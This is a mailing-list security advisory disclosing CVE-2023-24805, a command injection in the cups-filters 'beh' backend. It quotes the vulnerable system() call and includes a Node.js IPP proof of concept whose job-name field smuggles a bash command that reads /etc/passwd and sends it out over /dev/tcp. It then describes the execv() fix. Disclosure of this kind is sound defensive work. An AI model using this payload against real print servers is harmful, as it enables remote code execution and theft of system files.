Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 17 May 2023 11:30:11 +0200
From: Till Kamppeter <>
Subject: CVE-2023-24805: RCE in cups-filters, beh CUPS backend

Following bug got reported to OpenPrinting's GitHub, repo cups-filters, 
as a private (security) issue report:


If you use "beh" to create an accessible network printer, this security 
vulnerability can cause remote code execution.



Line 288 in 5c9498a
   retval = system(cmdline) >> 8;

     // (context: argv = beh <job-id> <user> <title> <copies> <options> 
      snprintf(cmdline, sizeof(cmdline),
      "%s/backend/%s '%s' '%s' '%s' '%s' '%s' %s",
      cups_serverbin, scheme, argv[1], argv[2], argv[3],
      (argc == 6 ? "1" : argv[4]),
      argv[5], filename);
    retval = system(cmdline) >> 8;

The system function will be called here to execute the command, and the 
user and title parameters are user-controlled and unsanitized .


      start a beh service lpadmin -p myprinter -E -v 

      exploit: //

var ipp = require('ipp');
var PDFDocument = require('pdfkit');
var concat = require("concat-stream");

var doc = new PDFDocument({margin:0});
doc.text("1.pdf", 0, 0);

doc.pipe(concat(function (data) {
var printer = ipp.Printer("");
var msg = {
"operation-attributes-tag": {
"requesting-user-name": "Bumblebee",
"job-name": "';env; bash -c \"/usr/bin/cat ${PWD}etc/${PWD}/passwd > 
${PWD}dev${PWD}tcp${PWD}${PWD}1337\";'' #.pdf",
"document-format": "application/pdf"
        "media-col": {
          "media-source": "tray-2"
, data: data
printer.execute("Print-Job", msg, function(err, res){

The report got assigned CVE-2023-24805

A fix is to use execv() instead of system() and was proposed as a pull 
request attached to the bug report.

The pull request is merged now into (branch "master")

as commit

and the fix is also ported to the "1.x" branch of cups-filters, as commit

The fix will also be included in the upcoming releases, 2.0.0 and 1.28.18.


Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.